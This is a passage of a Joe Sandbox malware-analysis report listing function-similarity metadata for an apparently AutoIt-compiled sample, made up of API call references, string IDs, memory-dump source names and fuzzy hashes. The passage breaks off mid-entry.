                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2625713937-0
                                                                                                            • Opcode ID: 47c7d47a9e2fa406a350faf53631827d980e5ea74dc94ca56529c7a6186ed4b8
                                                                                                            • Instruction ID: 555b3972824a5193c53498d5db8cd11a3f6d6d4c3b0178bf26455166ee07c230
                                                                                                            • Opcode Fuzzy Hash: 47c7d47a9e2fa406a350faf53631827d980e5ea74dc94ca56529c7a6186ed4b8
                                                                                                            • Instruction Fuzzy Hash: 4EF01930005388EFDB26AF66ED68B643B65AB91362F048254F465A91F0C7308A9BDF30
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __freea$_free
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                            • Opcode ID: 98dfd22241e77bd8369b3e99c4f9451d3bea0f30efb43c7686b49921a1e8ce06
                                                                                                            • Instruction ID: 5f77c40d6364d37d01246038b00eab12a46620f00e84cc26b33a316e54c97965
                                                                                                            • Opcode Fuzzy Hash: 98dfd22241e77bd8369b3e99c4f9451d3bea0f30efb43c7686b49921a1e8ce06
                                                                                                            • Instruction Fuzzy Hash: F3D12779900206DACB24BF68C845BFEB7B8FF06700F2C4259E9459B650D3759D8ACBB1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D70242: EnterCriticalSection.KERNEL32(00E2070C,00E21884,?,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7024D
                                                                                                              • Part of subcall function 00D70242: LeaveCriticalSection.KERNEL32(00E2070C,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7028A
                                                                                                              • Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DD6238
                                                                                                              • Part of subcall function 00D701F8: EnterCriticalSection.KERNEL32(00E2070C,?,?,00D68747,00E22514), ref: 00D70202
                                                                                                              • Part of subcall function 00D701F8: LeaveCriticalSection.KERNEL32(00E2070C,?,00D68747,00E22514), ref: 00D70235
                                                                                                              • Part of subcall function 00DC359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DC35E4
                                                                                                              • Part of subcall function 00DC359C: LoadStringW.USER32(00E22390,?,00000FFF,?), ref: 00DC360A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                            • String ID: x#$x#$x#
                                                                                                            • API String ID: 1072379062-1894725482
                                                                                                            • Opcode ID: d72d0a492976e781c3691e38af845e124204035e47581319a7a465c95aa972b8
                                                                                                            • Instruction ID: 7cc762ee3c43aba81489b560e292567f05d35f1dcc894a2465332270c27e9085
                                                                                                            • Opcode Fuzzy Hash: d72d0a492976e781c3691e38af845e124204035e47581319a7a465c95aa972b8
                                                                                                            • Instruction Fuzzy Hash: 8DC13B71A00205AFDB14DF98D891EBEB7B9EF48310F14806AF955AB391DB70E945CBB0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D70242: EnterCriticalSection.KERNEL32(00E2070C,00E21884,?,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7024D
                                                                                                              • Part of subcall function 00D70242: LeaveCriticalSection.KERNEL32(00E2070C,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7028A
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DD7BFB
                                                                                                              • Part of subcall function 00D701F8: EnterCriticalSection.KERNEL32(00E2070C,?,?,00D68747,00E22514), ref: 00D70202
                                                                                                              • Part of subcall function 00D701F8: LeaveCriticalSection.KERNEL32(00E2070C,?,00D68747,00E22514), ref: 00D70235
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                            • API String ID: 535116098-3733170431
                                                                                                            • Opcode ID: af5ed00e62aa008777ab9bb4422891ede682184d2b9d7e1abd1b2348cd72f176
                                                                                                            • Instruction ID: d84a6ac7081d19501618c857c87b92a6438ae849d0b13721bcec6a96e2422fd4
                                                                                                            • Opcode Fuzzy Hash: af5ed00e62aa008777ab9bb4422891ede682184d2b9d7e1abd1b2348cd72f176
                                                                                                            • Instruction Fuzzy Hash: 8D914C74A04209EFCB14EF58D891DADB7B2EF45300F54809AF8466B392EB71AE45CB71
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DBB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DB21D0,?,?,00000034,00000800,?,00000034), ref: 00DBB42D
                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DB2760
                                                                                                              • Part of subcall function 00DBB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DB21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00DBB3F8
                                                                                                              • Part of subcall function 00DBB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00DBB355
                                                                                                              • Part of subcall function 00DBB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DB2194,00000034,?,?,00001004,00000000,00000000), ref: 00DBB365
                                                                                                              • Part of subcall function 00DBB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DB2194,00000034,?,?,00001004,00000000,00000000), ref: 00DBB37B
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DB27CD
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DB281A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                            • Opcode ID: a250306e48f165d566b102f34dbf64a65b66ced52f299e127353207d7e63ca96
                                                                                                            • Instruction ID: 6777ecdeb9f7d47a41df66c33a5d98648e42874347834f1027a68a2bb705f1d5
                                                                                                            • Opcode Fuzzy Hash: a250306e48f165d566b102f34dbf64a65b66ced52f299e127353207d7e63ca96
                                                                                                            • Instruction Fuzzy Hash: D2413C76900218AFDB10DBA4CD85AEEBBB8EF09710F004059FA56B7291DB706E45CBB0
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AHSlIDftf1.exe,00000104), ref: 00D81769
                                                                                                            • _free.LIBCMT ref: 00D81834
                                                                                                            • _free.LIBCMT ref: 00D8183E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                            • API String ID: 2506810119-1322176223
                                                                                                            • Opcode ID: c7bac39378af856dcdee4621bc4e80d4fda51a48f8acd754d4fb8591968c07b7
                                                                                                            • Instruction ID: 8be9897268593eb0e2c417e668d5b0c0c6cd375cec023cc318e7feca514d3ffd
                                                                                                            • Opcode Fuzzy Hash: c7bac39378af856dcdee4621bc4e80d4fda51a48f8acd754d4fb8591968c07b7
                                                                                                            • Instruction Fuzzy Hash: 66318279A00258FFDB21EB999C81D9EBBFCEB95710B1441AAF404D7211D6708E4ACBB0
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DBC306
                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00DBC34C
                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E21990,013E57E8), ref: 00DBC395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 135850232-4108050209
                                                                                                            • Opcode ID: d3a1793d3431f11b800206a3b88361a56aa76cf80299aed5cb622c28415f6e7f
                                                                                                            • Instruction ID: dc1244f17176f1578f21f283a42f512db824ce1d81dec1185eec4fc4c635348a
                                                                                                            • Opcode Fuzzy Hash: d3a1793d3431f11b800206a3b88361a56aa76cf80299aed5cb622c28415f6e7f
                                                                                                            • Instruction Fuzzy Hash: 6A418D71214341DFD720DF24D884B9ABBE4FB85320F08961EE8A697391DB70A904CB72
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DECC08,00000000,?,?,?,?), ref: 00DE44AA
• GetWindowLongW.USER32 ref: 00DE44C7
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE44D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: c300e16237384c64bd52cd28b075ff719c617ec189b59583c80c76da671f8f5d
• Instruction ID: 96f48165ad4522b79b081b16231a66be912674f2af9c5d0ef0aaa883539f1f01
• Opcode Fuzzy Hash: c300e16237384c64bd52cd28b075ff719c617ec189b59583c80c76da671f8f5d
• Instruction Fuzzy Hash: B9317C31210285AFDB21AE39DC45BEA77A9EB08334F244715F979A21E0D770EC559770
APIs
  • Part of subcall function 00DD335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DD3077,?,?), ref: 00DD3378
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
• _wcslen.LIBCMT ref: 00DD309B
• htons.WSOCK32(00000000,?,?,00000000), ref: 00DD3106
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
• Opcode ID: b7272e3f1a150490c17338b61d71ba4428dc065a9bdce9c7db2d36eecdb73b18
• Instruction ID: a072101d8c15f438f98c0a69b0601860d8008e263ed0fde2150dffffc3274222
• Opcode Fuzzy Hash: b7272e3f1a150490c17338b61d71ba4428dc065a9bdce9c7db2d36eecdb73b18
• Instruction Fuzzy Hash: DA31B539604306DFCB10DF68C986EA977E0EF54318F28805AE9159B392D771EE45C772
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DE4705
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DE4713
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DE471A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: f392be99a82390cfa32056a16e551272ddb91bd7ed42500f89d7c4e9a7662a1f
• Instruction ID: d2ca45ac6f95bdc6390f5394b42e3cfecb100a46349fce1a30093937638e706e
• Opcode Fuzzy Hash: f392be99a82390cfa32056a16e551272ddb91bd7ed42500f89d7c4e9a7662a1f
• Instruction Fuzzy Hash: 312151B5600244AFDB10EF65DCC1DA737ADEB5A364B040059F9049B351C730EC52CAB0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: _wcslen
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 176396367-2734436370
• Opcode ID: 75357fa5922e86f117bf7345ab9d25610f89cedc780ffb32e6483a553a1cb349
• Instruction ID: f71849f42c6602dc32a8b06a299be6d7a1c04baf265be4a410dd2957af51dd0e
• Opcode Fuzzy Hash: 75357fa5922e86f117bf7345ab9d25610f89cedc780ffb32e6483a553a1cb349
• Instruction Fuzzy Hash: 17213832144590E6C731AB259C22FFBF3D8DF51310F688026FA8B97041EB51DD45C2B5
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DE3840
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DE3850
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DE3876
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 6775a58db2521362da628c3b36b3054ebea8bb8b465f50ff16b7fc3d05d9727e
• Instruction ID: 964039bd82c926fa1c282632de3cae50699b34f0970fb55feea296dd815b1af9
• Opcode Fuzzy Hash: 6775a58db2521362da628c3b36b3054ebea8bb8b465f50ff16b7fc3d05d9727e
• Instruction Fuzzy Hash: 7121B072610258BBEF21AF56CC85EBB376AEF89750F148124F9049B190C671DC5287B0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00DC4A08
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DC4A5C
• SetErrorMode.KERNEL32(00000000,?,?,00DECC08), ref: 00DC4AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: 879f3a45fd1402599bfa9913ff398565823a11764d4cc14f68c855e1926faf42
• Instruction ID: 8c4bf0888f3301cb2959e9203d712388ca4e83075a7ca6b147c0455064636338
• Opcode Fuzzy Hash: 879f3a45fd1402599bfa9913ff398565823a11764d4cc14f68c855e1926faf42
• Instruction Fuzzy Hash: DC310F75A00209AFDB10DF54C995EAABBF8EF05308F144099E905DB252D771ED46CB71
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DE424F
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DE4264
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DE4271
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 0f57b04a401207579ebe7ef4aff0002ebc84143fab80f04e0133d25987c76446
• Instruction ID: 4a9f3a86b7453b06195bae8776b9ebdcb825bbd68498f46328066533881dc610
• Opcode Fuzzy Hash: 0f57b04a401207579ebe7ef4aff0002ebc84143fab80f04e0133d25987c76446
• Instruction Fuzzy Hash: 96110631240388BEEF206F2ACC46FAB3BACEF95B64F010124FA55E60A0D271DC519B34
APIs
  • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
  • Part of subcall function 00DB2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DB2DC5
  • Part of subcall function 00DB2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB2DD6
  • Part of subcall function 00DB2DA7: GetCurrentThreadId.KERNEL32 ref: 00DB2DDD
  • Part of subcall function 00DB2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DB2DE4
• GetFocus.USER32 ref: 00DB2F78
  • Part of subcall function 00DB2DEE: GetParent.USER32(00000000), ref: 00DB2DF9
• GetClassNameW.USER32(?,?,00000100), ref: 00DB2FC3
• EnumChildWindows.USER32(?,00DB303B), ref: 00DB2FEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: 14a557e369a5896c7ea77ba19bf7b47a49d427ae80011dedb9dde8c2f9831634
• Instruction ID: 2ef3ebfcc08ab3952e51c6bc006e91a5fe79b3eca32a3ec0fd3545f280e8f349
• Opcode Fuzzy Hash: 14a557e369a5896c7ea77ba19bf7b47a49d427ae80011dedb9dde8c2f9831634
• Instruction Fuzzy Hash: 3511A272600205ABCF147F648CC5EFE376AEF94305F045079BD0A9B252EE74994A9B70
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DE58C1
                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DE58EE
                                                                                                            • DrawMenuBar.USER32(?), ref: 00DE58FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                            • Opcode ID: e6cc0572900cf7326b472152bc29f291112aa2eafc551efc2cdc04d812a8fd53
                                                                                                            • Instruction ID: 40421b8ff0652c859e914a152032de7221ff2c48c2b40abf576fbd776f24033a
                                                                                                            • Opcode Fuzzy Hash: e6cc0572900cf7326b472152bc29f291112aa2eafc551efc2cdc04d812a8fd53
                                                                                                            • Instruction Fuzzy Hash: 51016131500298EFDB11AF12EC44BEEBBB4FB453A4F148099F949DA252DB308A94DF31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
